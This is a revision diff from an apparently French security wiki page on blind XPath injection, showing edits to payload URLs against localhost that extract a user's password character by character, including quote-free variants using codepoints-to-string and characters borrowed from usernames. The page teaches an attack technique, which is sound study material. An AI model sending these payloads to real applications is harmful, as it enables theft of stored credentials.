Ci-dessous, les différences entre deux révisions de la page.
Prochaine révision Les deux révisions suivantes | |||
web:injection_blind_xpath [2016/02/04 17:04] arkinar créée |
web:injection_blind_xpath [2016/02/16 16:02] arkinar |
||
---|---|---|---|
Ligne 57: | Ligne 57: | ||
<code> | <code> | ||
- | http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='a' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='a' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='b' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='b' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='c' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='c' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='d' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='d' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='e' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='e' |
... | ... | ||
- | http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='p' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='p' |
</code> | </code> | ||
Ligne 73: | Ligne 73: | ||
<code> | <code> | ||
- | http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='a' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='a' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='b' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='b' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='c' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='c' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='d' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='d' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='e' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='e' |
... | ... | ||
- | http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='A' <=OK | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='A' <=OK |
</code> | </code> | ||
Ligne 85: | Ligne 85: | ||
<code> | <code> | ||
- | http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='a' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='a' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='b' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='b' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='c' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='c' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='d' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='d' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='e' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='e' |
... | ... | ||
- | http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='S' <=OK | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='S' <=OK |
</code> | </code> | ||
Ligne 97: | Ligne 97: | ||
<code> | <code> | ||
- | http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='a' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='a' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='b' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='b' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='c' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='c' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='d' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='d' |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='e' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='e' |
... | ... | ||
- | http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='p' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='p' |
</code> | </code> | ||
Ligne 122: | Ligne 122: | ||
<code> | <code> | ||
- | http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)=codepoints-to-string(112) | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)=codepoints-to-string(112) |
</code> | </code> | ||
Ligne 128: | Ligne 128: | ||
<code> | <code> | ||
- | http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='p' | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='p' |
</code> | </code> | ||
Ligne 140: | Ligne 140: | ||
<code> | <code> | ||
- | http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)=substring(user[1]/username,1,1) | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)=substring(//user[1]/username,1,1) |
</code> | </code> | ||
Ligne 148: | Ligne 148: | ||
<code> | <code> | ||
- | http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)=substring(user[4]/username,3,1) <= p | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)=substring(//user[4]/username,3,1) <= p |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)=substring(user[1]/username,1,1) <= A | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)=substring(//user[1]/username,1,1) <= A |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)=substring(user[4]/username,1,1) <= S | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)=substring(//user[4]/username,1,1) <= S |
- | http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)=substring(user[4]/username,1,1) <= S | + | http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)=substring(//user[4]/username,1,1) <= S |
</code> | </code> | ||